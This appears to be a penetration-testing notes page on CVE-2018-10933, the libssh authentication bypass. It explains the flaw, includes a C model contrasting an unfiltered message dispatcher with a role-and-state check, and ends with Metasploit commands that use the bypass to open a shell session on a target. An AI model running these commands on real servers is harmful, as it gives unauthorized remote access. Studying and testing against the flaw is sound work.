libssh 0.8.1 - CVE-2018-10933
Theory
Description
In late 2018, a critical vulnerability was uncovered in the libssh server code. It lets a client bypass the authentication process and set the internal state machine maintained by the library to the authenticated state, enabling the (otherwise prohibited) creation of channels.
Read More: https://www.libssh.org/security/advisories/CVE-2018-10933.txt
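A simplified model of the flaw described above, added here as an illustration and not taken from libssh: a server that lets a client-only message reach a shared handler ends up authenticated without any credential check, while a role-and-state filter in front of the handlers drops that message. The session struct and function names are hypothetical; the message numbers come from RFC 4252 and RFC 4254, and the choice of `SSH2_MSG_USERAUTH_SUCCESS` as the triggering message follows the linked advisory.

```c
#include <stdbool.h>
#include <stdint.h>

/* SSH message numbers (RFC 4252 and RFC 4254). */
#define MSG_USERAUTH_REQUEST 50
#define MSG_USERAUTH_SUCCESS 52
#define MSG_CHANNEL_OPEN     90

enum role  { ROLE_CLIENT, ROLE_SERVER };
enum state { ST_AUTHENTICATING, ST_AUTHENTICATED };

/* Hypothetical, simplified session object; not libssh's own struct. */
struct session { enum role role; enum state state; int channels; };

/* One handler set shared by client and server sessions. */
static void handle(struct session *s, uint8_t type)
{
    if (type == MSG_USERAUTH_SUCCESS)       /* only meaningful to a client */
        s->state = ST_AUTHENTICATED;
    else if (type == MSG_CHANNEL_OPEN && s->state == ST_AUTHENTICATED)
        s->channels++;
    /* MSG_USERAUTH_REQUEST: credential checking is left out of this model. */
}

/* Flawed: every known message reaches its handler, whatever the role or state. */
static bool dispatch_flawed(struct session *s, uint8_t t) { handle(s, t); return true; }

/* Hardened: check role and state per message type before any handler runs. */
static bool dispatch_filtered(struct session *s, uint8_t type)
{
    bool ok = false;
    if (type == MSG_USERAUTH_REQUEST)
        ok = s->role == ROLE_SERVER && s->state == ST_AUTHENTICATING;
    else if (type == MSG_USERAUTH_SUCCESS)
        ok = s->role == ROLE_CLIENT && s->state == ST_AUTHENTICATING;
    else if (type == MSG_CHANNEL_OPEN)
        ok = s->state == ST_AUTHENTICATED;
    if (ok) handle(s, type);
    return ok;
}

/* Feed one constructed inbound sequence to a fresh server session; count channels. */
int channels_opened(bool filtered)
{
    struct session s = { ROLE_SERVER, ST_AUTHENTICATING, 0 };
    const uint8_t inbound[] = { MSG_USERAUTH_SUCCESS, MSG_CHANNEL_OPEN };
    for (unsigned i = 0; i < sizeof inbound; i++)
        (filtered ? dispatch_filtered : dispatch_flawed)(&s, inbound[i]);
    return s.channels;
}
```

With the flawed dispatcher the server session opens a channel although no credentials were ever checked; with the filter both messages are rejected and the session stays unauthenticated.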
Practical
Metasploit
msfconsole -q
use auxiliary/scanner/ssh/libssh_auth_bypass
set RHOSTS <IP>
set RPORT <ssh port>
set SPAWN_PTY true
run
# Interact with the session
sessions
sessions -i <session number>